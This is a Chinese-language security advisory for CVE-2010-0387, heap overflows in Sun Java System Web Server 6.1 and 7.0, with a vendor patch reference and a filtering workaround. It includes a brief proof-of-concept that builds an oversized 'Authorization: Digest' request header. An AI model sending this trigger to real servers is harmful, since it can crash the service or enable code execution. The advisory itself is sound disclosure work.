发布日期：2010-01-21
更新日期：2010-01-27

受影响系统：

Sun Java System Web Server 7.0
Sun Java System Web Server 6.1

描述：

---

BUGTRAQ  ID: 37896
CVE(CAN) ID: CVE-2010-0387

Sun Java System Web Server是高性能的WEB服务器。

Java System Web Server的webservd守护程序和管理服务器中存在多个堆溢出漏洞。远程攻击者可以通过在HTTP请求中包含超长的Authorization: Digest头字符串触发这些溢出，导致服务崩溃或执行任意代码。

<*来源：Evgeny Legerov （aland@freeradius.org）
  
  链接：http://intevydis.blogspot.com/2010/01/sun-java-system-web-server-70u7-digest.html
        http://secunia.com/advisories/38260/
        http://sunsolve.sun.com/search/document.do?assetkey=1-66-275850-1
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

buf = "PUT / HTTP/1.0\n"
buf += "Authorization: Digest "
buf += "ABCD,"*1000
buf += "\n\n"

建议：

---

临时解决方法：

* 禁止服务器处理Digest方式的Authorization头，通过以下方式之一实现：
  
1. 通过防火墙、负载均衡器或逆向代理过滤包含有Authorization: Digest字符串的HTTP头。
  
2. 在Web Server 7.0上，向obj.conf文件中添加以下规则覆盖包含有Digest字符串的Authorization头：

    <If defined $headers{'authorization'} and $headers{'authorization'} =~ "(?i)digest">
    NameTrans fn="set-variable" $headers{'authorization'} = "refuse"
    </If>

厂商补丁：

Sun
---
Sun已经为此发布了一个安全公告（Sun-Alert-6916389）以及相应补丁:
Sun-Alert-6916389：Multiple security vulnerabilities in the HTTP TRACE, WebDAV and Digest Authentication Methods in the Sun Java System Web Server and Sun Java System Web Proxy Server
链接：http://sunsolve.sun.com/search/document.do?assetkey=1-66-275850-1

浏览次数：2704
严重程度：0（网友投票）